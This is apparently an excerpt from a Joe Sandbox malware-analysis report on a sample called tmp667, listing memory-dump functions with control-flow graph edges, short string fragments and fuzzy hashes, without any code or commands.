                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,!p$4$8kM$fM
                                                                                                • API String ID: 0-3818114213
                                                                                                • Opcode ID: 7f62ac3772b465bc2e046468a0dc09554ae181667bef9ed40ca9efa0c93cad9a
                                                                                                • Instruction ID: 3192c3b867851ee59d219dafb4047cf6f5c032381feb6f2376ed557d3511301f
                                                                                                • Opcode Fuzzy Hash: 7f62ac3772b465bc2e046468a0dc09554ae181667bef9ed40ca9efa0c93cad9a
                                                                                                • Instruction Fuzzy Hash: CC220D34A10218DFDF24DF54C894BADB7B2BF48701F1491A6E909AB3A5DB70AD85CF60
                                                                                                Function 006D19A3 Relevance: 4.3, Strings: 3, Instructions: 539COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1603 6d19a3-6d1a4b 1610 6d1a51-6d1b14 1603->1610 1611 6d1b23-6d1b6b 1603->1611 1610->1611 1641 6d1b16-6d1b20 1610->1641 1616 6d1d0c-6d1dc0 1611->1616 1617 6d1b71-6d1bb3 1611->1617 1646 6d1e7f-6d1eb9 1616->1646 1647 6d1dc6-6d1e7d 1616->1647 1624 6d1cf1-6d1d00 1617->1624 1627 6d1d06-6d1d07 1624->1627 1628 6d1bd0-6d1bdf 1624->1628 1632 6d208f-6d20e4 1627->1632 1630 6d1be6-6d1c58 1628->1630 1631 6d1be1 1628->1631 1643 6d1c5f-6d1ce6 1630->1643 1644 6d1c5a 1630->1644 1631->1630 1648 6d237d-6d23ab 1632->1648 1641->1611 1689 6d1ce8 1643->1689 1690 6d1ceb 1643->1690 1644->1643 1661 6d1ec0-6d1ec9 1646->1661 1647->1661 1656 6d20e9-6d212a 1648->1656 1657 6d23b1-6d23d2 1648->1657 1664 6d212c 1656->1664 1665 6d2133-6d2134 1656->1665 1727 6d23d8 call 6d55c9 1657->1727 1728 6d23d8 call 6d55d8 1657->1728 1666 6d207a-6d2089 1661->1666 1664->1665 1668 6d215e-6d21ae 1664->1668 1669 6d2139-6d214b 1664->1669 1670 6d22ca-6d230f 1664->1670 1671 6d2216-6d227b 1664->1671 1672 6d2311-6d2323 1664->1672 1673 6d2280-6d22c5 1664->1673 1674 6d21b3-6d2211 1664->1674 1675 6d2333-6d236c 1664->1675 1676 6d2377 1665->1676 1666->1632 1677 6d1ece-6d1edd 1666->1677 1667 6d23de-6d241a call 541deb8 1706 6d2420 1667->1706 1668->1676 1685 6d214d 1669->1685 1686 6d2152-6d2159 1669->1686 1670->1676 1671->1676 1679 6d232a-6d2331 1672->1679 1680 6d2325 1672->1680 1673->1676 1674->1676 1675->1676 1676->1648 1682 6d1edf 1677->1682 1683 6d1ee4-6d1f65 1677->1683 1679->1676 1680->1679 1682->1683 1715 6d1f6b-6d1f96 1683->1715 1716 6d1ff4-6d201f 1683->1716 1685->1686 1686->1676 1689->1690 1690->1624 1719 6d1f9d-6d1fef 1715->1719 1720 6d1f98 1715->1720 1717 6d2026-6d2069 1716->1717 1718 6d2021 1716->1718 1726 6d2074 1717->1726 1718->1717 1719->1726 1720->1719 1726->1666 1727->1667 1728->1667
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `{$$`{$$oV
                                                                                                • API String ID: 0-1816416316
                                                                                                • Opcode ID: 81c0f759b1ef6c6487e90ae56a70327928bbf8958eb3b67df7e40b26c96022cd
                                                                                                • Instruction ID: 6f8300c481e5251b75f2ece606a46f2338bc5867fe8210f46631e7c34670406e
                                                                                                • Opcode Fuzzy Hash: 81c0f759b1ef6c6487e90ae56a70327928bbf8958eb3b67df7e40b26c96022cd
                                                                                                • Instruction Fuzzy Hash: AA52C6B4A046288FCB64DF28DD84B9AB7B6FB89301F1085E5D90DA7355DB30AE81CF51
                                                                                                Function 006F7318 Relevance: 3.3, Strings: 2, Instructions: 804COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1857 6f7318-6f732e 1858 6f7349-6f7355 1857->1858 1859 6f7330-6f7347 1857->1859 1860 6f736f-6f738e 1858->1860 1861 6f7357-6f736c 1858->1861 1859->1860 1863 6f73d7-6f73db 1860->1863 1864 6f7390-6f73a0 1860->1864 1861->1860 1867 6f73fd-6f7403 1863->1867 1868 6f73dd-6f73e1 1863->1868 1865 6f73a8-6f73ae 1864->1865 1866 6f73a2 1864->1866 1865->1863 1866->1863 1870 6f73a4-6f73a6 1866->1870 1872 6f740b-6f7411 1867->1872 1873 6f7405-6f7409 1867->1873 1868->1867 1871 6f73e3-6f73fb 1868->1871 1870->1863 1870->1865 1871->1867 1876 6f73b0-6f73c0 1871->1876 1873->1872 1874 6f7414-6f7451 1873->1874 1882 6f7477-6f748c 1874->1882 1883 6f7453-6f745c 1874->1883 1876->1863 1878 6f73c2-6f73d4 1876->1878 1878->1863 1884 6f750e-6f7567 1882->1884 1885 6f7492-6f749f 1882->1885 1900 6f756d-6f7573 1884->1900 1901 6f7628-6f7689 1884->1901 1888 6f74b6-6f74ba 1885->1888 1889 6f74a1-6f74af call 6f6eb0 1885->1889 1891 6f74bc-6f74e0 1888->1891 1892 6f74e2 1888->1892 1893 6f74b1-6f74b4 1889->1893 1891->1892 1894 6f74eb-6f74fa 1891->1894 1892->1894 1893->1894 1897 6f7502-6f750b 1894->1897 1902 6f759d-6f75ae 1900->1902 1903 6f7575-6f7578 1900->1903 1920 6f768b-6f76b2 1901->1920 1921 6f76b3-6f7701 1901->1921 1908 6f75b6-6f75ba 1902->1908 1909 6f75b0 1902->1909 1904 6f757a-6f759c 1903->1904 1905 6f75f3-6f7621 1903->1905 1905->1901 1912 6f75c2-6f75f2 1908->1912 1909->1912 1913 6f75b2-6f75b4 1909->1913 1913->1908 1913->1912 1926 6f7703-6f770c call 6f7318 1921->1926 1927 6f7711-6f7715 1921->1927 1926->1927 1929 6f772b-6f773c 1927->1929 1930 6f7717-6f7726 1927->1930 1932 6f7c3a-6f7c68 1929->1932 1933 6f7742-6f7757 1929->1933 1931 6f7ac0-6f7ac7 1930->1931 1940 6f7c6f-6f7c86 1932->1940 1941 6f7c6a 1932->1941 1934 6f7759-6f775e 1933->1934 1935 6f7763-6f7776 1933->1935 1934->1931 1936 6f777c-6f7788 1935->1936 1937 6f7ac8-6f7ae6 1935->1937 1936->1932 1939 6f778e-6f77c5 1936->1939 1945 6f7aed-6f7b0b 1937->1945 1942 6f77c7-6f77cc 1939->1942 1943 6f77d1-6f77d5 1939->1943 1953 6f7c89-6f7c8f 1940->1953 1941->1940 1942->1931 1943->1945 1946 6f77db-6f77e7 1943->1946 1956 6f7b12-6f7b30 1945->1956 1946->1932 1948 6f77ed-6f7824 1946->1948 1951 6f7826-6f782b 1948->1951 1952 6f7830-6f7834 1948->1952 1951->1931 1955 6f783a-6f7846 1952->1955 1952->1956 1958 6f7c98-6f7c99 1953->1958 1959 6f7c91 1953->1959 1955->1932 1962 6f784c-6f7883 1955->1962 1972 6f7b37-6f7b55 1956->1972 1960 6f7ca0-6f7cc1 1958->1960 1959->1958 1959->1960 1963 6f7ccd-6f7cec 1959->1963 1964 6f7c9b-6f7c9f 1959->1964 1960->1953 1973 6f7cc3-6f7ccb 1960->1973 1966 6f788f-6f7893 1962->1966 1967 6f7885-6f788a 1962->1967 1963->1953 1975 6f7cee-6f7cf4 1963->1975 1971 6f7899-6f78a5 1966->1971 1966->1972 1967->1931 1971->1932 1976 6f78ab-6f78e2 1971->1976 1980 6f7b5c-6f7b7a 1972->1980 1973->1953 1975->1953 1977 6f78ee-6f78f2 1976->1977 1978 6f78e4-6f78e9 1976->1978 1977->1980 1981 6f78f8-6f7904 1977->1981 1978->1931 1990 6f7b81-6f7b9f 1980->1990 1981->1932 1984 6f790a-6f7941 1981->1984 1985 6f794d-6f7951 1984->1985 1986 6f7943-6f7948 1984->1986 1989 6f7957-6f7963 1985->1989 1985->1990 1986->1931 1989->1932 1991 6f7969-6f79a0 1989->1991 1996 6f7ba6-6f7bc4 1990->1996 1993 6f79ac-6f79b0 1991->1993 1994 6f79a2-6f79a7 1991->1994 1993->1996 1997 6f79b6-6f79c2 1993->1997 1994->1931 2005 6f7bcb-6f7be9 1996->2005 1997->1932 2000 6f79c8-6f79ff 1997->2000 2002 6f7a0b-6f7a0f 2000->2002 2003 6f7a01-6f7a06 2000->2003 2002->2005 2006 6f7a15-6f7a21 2002->2006 2003->1931 2013 6f7bf0-6f7c0e 2005->2013 2006->1932 2008 6f7a27-6f7a5e 2006->2008 2010 6f7a67-6f7a6b 2008->2010 2011 6f7a60-6f7a65 2008->2011 2012 6f7a71-6f7a7a 2010->2012 2010->2013 2011->1931 2012->1932 2016 6f7a80-6f7ab5 2012->2016 2018 6f7c15-6f7c33 2013->2018 2017 6f7abb 2016->2017 2016->2018 2017->1931 2018->1932
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446542643.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6f0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p$DYM
                                                                                                • API String ID: 0-437157658
                                                                                                • Opcode ID: d4f3bdd6ea1f88531268ca915ede52026862e8de46b07f86f2edcf775bac2583
                                                                                                • Instruction ID: ed5dcbd2e81dfdb119eb08536f6801a649b4226f2fa03ab33a49d705406e2646
                                                                                                • Opcode Fuzzy Hash: d4f3bdd6ea1f88531268ca915ede52026862e8de46b07f86f2edcf775bac2583
                                                                                                • Instruction Fuzzy Hash: 31627A74A047198FCB15CF68C89466EFBF2FF88300F24856AEA66D7751DB34A901CB94
                                                                                                Function 006FCC20 Relevance: 1.6, Strings: 1, Instructions: 319COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446542643.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6f0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: dee455207b7ce913a0dfce23cf9018537c358d4fca6bfa0333654e17e5f346ae
                                                                                                • Instruction ID: 3e82d8e9d96269ba2a3bf09f60533b3159c0c48169981dffa3cf22a0044d9862
                                                                                                • Opcode Fuzzy Hash: dee455207b7ce913a0dfce23cf9018537c358d4fca6bfa0333654e17e5f346ae
                                                                                                • Instruction Fuzzy Hash: 11D10274E0521CCFEB24DF69D944BADBBB7BB89310F2090AAD509A7349DB705986DF00
                                                                                                Function 00D58D48 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 32b6000b21bc1aebdb3e97be80f8e6ff5362b4f8ed206651c0cab0b1027525a5
                                                                                                • Instruction ID: 6b0e7c0c542861e33670c5580e4670530e4757e5ee5bcae18e68c1ce1262479e
                                                                                                • Opcode Fuzzy Hash: 32b6000b21bc1aebdb3e97be80f8e6ff5362b4f8ed206651c0cab0b1027525a5
                                                                                                • Instruction Fuzzy Hash: BFB13470E04218CFDB24DFA9D854B9DB7F6BB89301F2080AAD809A7395DB719D89DF10
                                                                                                Function 00D58D3A Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 1e5895b9ddb3b3b9bdac813e49ecaf4ba1461d8e1dfbe3ae11714789b5585d55
                                                                                                • Instruction ID: 07a70d13a3b639885f0804c0f307aad956bf43f9a28b3eb930beb94232eb8961
                                                                                                • Opcode Fuzzy Hash: 1e5895b9ddb3b3b9bdac813e49ecaf4ba1461d8e1dfbe3ae11714789b5585d55
                                                                                                • Instruction Fuzzy Hash: BCB13674E05218CFDB24DFA9D844B9DB7F2BB89301F2480AAD809A7395DB719D89DF10
                                                                                                Function 006D0021 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 59dd6f3cad520242f953aa2e8f372ed7e5332faad98e4d79394b04d424d7e8b3
                                                                                                • Instruction ID: 5dbcfed8ff086cbfda005900e03ca23d993c1534719e786585f3859d4149914e
                                                                                                • Opcode Fuzzy Hash: 59dd6f3cad520242f953aa2e8f372ed7e5332faad98e4d79394b04d424d7e8b3
                                                                                                • Instruction Fuzzy Hash: 7C510B70E01A588BEB18DF6BDC4479ABBF3AFC9301F14C1AAD408AB259DB705985CF50
                                                                                                Function 006DD500 Relevance: .2, Instructions: 247COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f9e62e6d7a0d394149d7ee0d2ffb990913ff203b94ff709d54485841d31d43a4
                                                                                                • Instruction ID: c41ad5b913753eb9631bc1dcebeeb9b6ecabf6db2a870a29628ca9e3cacfd02e
                                                                                                • Opcode Fuzzy Hash: f9e62e6d7a0d394149d7ee0d2ffb990913ff203b94ff709d54485841d31d43a4
                                                                                                • Instruction Fuzzy Hash: 88B1C574E05218CFDB14EF6AD884BADBBF6BF89314F2090AAD419A7355D7309986CF40
                                                                                                Function 006DC858 Relevance: .2, Instructions: 209COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b1ec83d75f7a8c2897787c714412d0f9d1aaf05afd09a0a290b1ac8fbdb62f1a
                                                                                                • Instruction ID: 40b5b510884538b98b2a3ecadcc2339ef9b29ba879c3f0efe68960b06b8d29c0
                                                                                                • Opcode Fuzzy Hash: b1ec83d75f7a8c2897787c714412d0f9d1aaf05afd09a0a290b1ac8fbdb62f1a
                                                                                                • Instruction Fuzzy Hash: 79914870E0521ECFEB24CF69D854BADBBB2BF49324F2490AAD009A7355D7709985DF00
                                                                                                Function 001CECA8 Relevance: .2, Instructions: 208COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.445795160.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_1c0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 956f2aab6d5d64705583ac2c89aac566957a443214e4a74eddf4ca9f0cf48a70
                                                                                                • Instruction ID: b8d5db079d307149fd760f60c59c864bfc51a01cdb21ed6f202661c6cbd91ad4
                                                                                                • Opcode Fuzzy Hash: 956f2aab6d5d64705583ac2c89aac566957a443214e4a74eddf4ca9f0cf48a70
                                                                                                • Instruction Fuzzy Hash: EF811675A00618CFDB14DFA9C484E9DBBF5BF98311B1685AAE816DB360DB30ED41CB90
                                                                                                Function 001C8A00 Relevance: .2, Instructions: 170COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.445795160.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_1c0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 24e3ba3372732d0751ada3bf523ba633e64a0140ca0d79091c37937c38f0beb1
                                                                                                • Instruction ID: 60d7227fff1c7f311cb74bf8bfb0eb15da2ebdd58f6edbca454a7e2a95a3723c
                                                                                                • Opcode Fuzzy Hash: 24e3ba3372732d0751ada3bf523ba633e64a0140ca0d79091c37937c38f0beb1
                                                                                                • Instruction Fuzzy Hash: 5A7128B5E047058FD708EFAAE94169EBBF6BF88300F14C56AE4149B368DF345946CB50
                                                                                                Function 001C8A10 Relevance: .2, Instructions: 165COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.445795160.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_1c0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 98a997cdb3d954dd83348d1fc3bb31717474a82fd67f911ac896a2aa09e360a5
                                                                                                • Instruction ID: 8c1a382a62b39eb0ac98f0a3d2081a2afcba36c6db1e8a0f057e8abdbce84ef9
                                                                                                • Opcode Fuzzy Hash: 98a997cdb3d954dd83348d1fc3bb31717474a82fd67f911ac896a2aa09e360a5
                                                                                                • Instruction Fuzzy Hash: CE711AB5E017098FD708EFAAE94169EBBF6BB88300F14C56AE4149B368DF345946CB50
                                                                                                Function 001CE3D8 Relevance: 6.6, Strings: 5, Instructions: 351COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 617 1ce3d8-1ce400 619 1ce4ec-1ce511 617->619 620 1ce406-1ce40a 617->620 629 1ce518-1ce53c 619->629 621 1ce40c-1ce418 620->621 622 1ce41e-1ce422 620->622 621->622 621->629 623 1ce428-1ce43f 622->623 624 1ce543-1ce568 622->624 635 1ce441-1ce44d 623->635 636 1ce453-1ce457 623->636 644 1ce56f-1ce5a9 624->644 629->624 635->636 635->644 638 1ce459-1ce472 call 1c01b0 636->638 639 1ce483-1ce49c 636->639 638->639 652 1ce474-1ce477 638->652 650 1ce49e-1ce4c2 639->650 651 1ce4c5-1ce4e9 639->651 660 1ce5ef-1ce5f7 644->660 661 1ce5ab-1ce5c2 644->661 656 1ce480 652->656 656->639 662 1ce5fa-1ce61f 661->662 663 1ce5c4-1ce5e4 661->663 670 1ce626-1ce67a 662->670 663->670 671 1ce5e6-1ce5ee 663->671 677 1ce680-1ce68c 670->677 678 1ce721-1ce76f 670->678 671->660 681 1ce68e-1ce695 677->681 682 1ce696-1ce6aa 677->682 690 1ce79f-1ce7a5 678->690 691 1ce771-1ce795 678->691 685 1ce6ac-1ce6d1 682->685 686 1ce719-1ce720 682->686 697 1ce714-1ce717 685->697 698 1ce6d3-1ce6ed 685->698 694 1ce7b7-1ce7c6 690->694 695 1ce7a7-1ce7b4 690->695 691->690 693 1ce797 691->693 693->690 697->685 697->686 698->697 700 1ce6ef-1ce6f8 698->700 701 1ce6fa-1ce6fd 700->701 702 1ce707-1ce713 700->702 701->702
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.445795160.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_1c0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p$(!p$(!p$(!p$(!p
                                                                                                • API String ID: 0-3955841951
                                                                                                • Opcode ID: eb2a4863b31000acf97c60c62a2c34fed5100c36f7c002ed0cbd6f3d8411f1a5
                                                                                                • Instruction ID: e7221d923f7cbd7b33cf446214801052ec05cae138fd5409095f162fce050e00
                                                                                                • Opcode Fuzzy Hash: eb2a4863b31000acf97c60c62a2c34fed5100c36f7c002ed0cbd6f3d8411f1a5
                                                                                                • Instruction Fuzzy Hash: 8BC102363143558FDB14DF68D855AAE7BE2EF84314B29417EE909CB3A6CB34DC0287A1
                                                                                                Function 006D6992 Relevance: 3.8, Strings: 3, Instructions: 87COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1730 6d6992-6d699e 1731 6d7734-6d7764 1730->1731 1732 6d69a4-6d69c9 1730->1732 1740 6d83ae-6d8412 call 6d5418 call 6d2ed8 call 6d54b0 1731->1740 1741 6d776a-6d778f call 6d5708 1731->1741 1735 6d69cf-6d69d7 1732->1735 1736 6d6937-6d693f 1732->1736 1735->1736 1738 6d6948-6d74e4 1736->1738 1739 6d6941-6d803d 1736->1739 1744 6d75dc-6d75ec 1738->1744 1745 6d74ea-6d74f2 1738->1745 1739->1736 1753 6d8043-6d804b 1739->1753 1758 6d8418-6d8420 1740->1758 1759 6d8967-6d8996 call 6d5418 call 5415c30 1740->1759 1741->1736 1750 6d7795-6d779d 1741->1750 1744->1736 1745->1736 1745->1744 1750->1736 1753->1736 1758->1736 1762 6d899b-6d89c8 call 6d5708 1759->1762 1762->1736 1766 6d89ce-6d89d6 1762->1766 1766->1736
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ^$^$oV
                                                                                                • API String ID: 0-2349651716
                                                                                                • Opcode ID: aa7154dcdebc8daa105922ccc8a9c46c99684d61569a6452b142a24f922b2376
                                                                                                • Instruction ID: d4d256f5b4deaf7e6507d82ef8da53f823da7c4d1ca6d5149fa7fa4bc45ec71f
                                                                                                • Opcode Fuzzy Hash: aa7154dcdebc8daa105922ccc8a9c46c99684d61569a6452b142a24f922b2376
                                                                                                • Instruction Fuzzy Hash: 1E41B374D01268CFDB51EFA4C898BDDBBB2BB49301F20519AE4096B394CB745E85CF54
                                                                                                Function 05400347 Relevance: 3.8, Strings: 3, Instructions: 83COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1768 5400347-5400363 1770 540a369-540a433 call 6db938 1768->1770 1771 5400369-5400391 1768->1771 1796 540a439-540a446 1770->1796 1774 5400106-5400111 1771->1774 1775 5400397-54003a2 1771->1775 1777 5400113-5404517 1774->1777 1778 540011a-5414010 1774->1778 1775->1774 1777->1774 1794 540451d-5404528 1777->1794 1778->1774 1794->1774 1797 540a44c-540a457 1796->1797 1798 540937e-5409399 1796->1798 1799 54093ab-54093bf 1798->1799 1800 540939b-54093a1 1798->1800 1799->1770 1800->1799
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.452343355.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_5400000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: <`$$T$oV
                                                                                                • API String ID: 0-870889960
                                                                                                • Opcode ID: aefc6be65273b51267e01cede2b8baa3d325bc46429c18910d339a43d15362af
                                                                                                • Instruction ID: dfe34b28cfdf9d43d83878e78b63b7d694cd545e708136807c64f028c0cbb21b
                                                                                                • Opcode Fuzzy Hash: aefc6be65273b51267e01cede2b8baa3d325bc46429c18910d339a43d15362af
                                                                                                • Instruction Fuzzy Hash: 8341F374A08228CFCB64DF58D958AEAB7B1FF49300F1050E6E549A7395D7746E90CF01
                                                                                                Function 006BBBA4 Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1802 6bbba4-6bbbc8 1823 6bbbce call 6bd1a9 1802->1823 1824 6bbbce call 6bd1b8 1802->1824 1804 6bbbd4-6bbc11 1805 6bb95a-6bb963 1804->1805 1806 6bbc17-6bbc22 1804->1806 1807 6bb96c-6bca3c 1805->1807 1808 6bb965 1805->1808 1806->1805 1807->1805 1815 6bca42-6bca4d 1807->1815 1809 6bb8f9-6bb942 1808->1809 1810 6bb8ef-6bb8f6 1808->1810 1811 6bc1cd-6bc238 1808->1811 1809->1805 1818 6bb944-6bb94f 1809->1818 1811->1805 1822 6bc23e-6bc249 1811->1822 1815->1805 1818->1805 1822->1805 1823->1804 1824->1804
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +$/$oV
                                                                                                • API String ID: 0-2082966017
                                                                                                • Opcode ID: 29c2b446885f0e37dabd0d5e442dd4a5b86b871253ed4e2148ea263767ba740d
                                                                                                • Instruction ID: df87dd2ba5575837d2fa9ebe50368ccb3dc21b25b37d2c8fa29f547cd628262a
                                                                                                • Opcode Fuzzy Hash: 29c2b446885f0e37dabd0d5e442dd4a5b86b871253ed4e2148ea263767ba740d
                                                                                                • Instruction Fuzzy Hash: 8721327490029ADBCB20EF58D844BDCB7B2FB49319F1091AAEA1DB7214C770AAC5CF44
                                                                                                Function 00D5261E Relevance: 3.8, Strings: 3, Instructions: 51COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1825 d5261e-d52623 call d539a5 1828 d5433e-d54354 1825->1828 1829 d52629-d52634 1825->1829 1834 d5435c-d54405 1828->1834 1830 d5014a-d50155 1829->1830 1832 d50157-d5413d 1830->1832 1833 d5015e-d50e70 1830->1833 1832->1830 1844 d54143-d5414e 1832->1844 1836 d50e77-d50e85 1833->1836 1837 d50e72 1833->1837 1834->1830 1848 d5440b-d54416 1834->1848 1836->1830 1837->1836 1844->1830 1848->1830
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$$"$(
                                                                                                • API String ID: 0-2989394736
                                                                                                • Opcode ID: 3ce081e4b29b46e589a42fc15790c180f71fdecbc9e4ffd62c7810ff21943339
                                                                                                • Instruction ID: 2267b5bcfc838086fd926667ce45be2d066f515f8dfdc66ddf671c6841d6f7f6
                                                                                                • Opcode Fuzzy Hash: 3ce081e4b29b46e589a42fc15790c180f71fdecbc9e4ffd62c7810ff21943339
                                                                                                • Instruction Fuzzy Hash: 5921A674A016288FDB64DF28D858BDABBF1BB4A301F5041EAD90EA7260DB305E84CF51
                                                                                                Function 006D2F18 Relevance: 3.8, Strings: 3, Instructions: 25COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1849 6d2f18-6d2f38 1851 6d2f3f-6d2f44 1849->1851 1852 6d2f3a 1849->1852 1854 6d2f4e-6d2f56 call 1ccad8 1851->1854 1852->1851 1855 6d2f5b-6d2f5f 1854->1855
                                                                                                Strings
                                                                                                Memory Dump Source
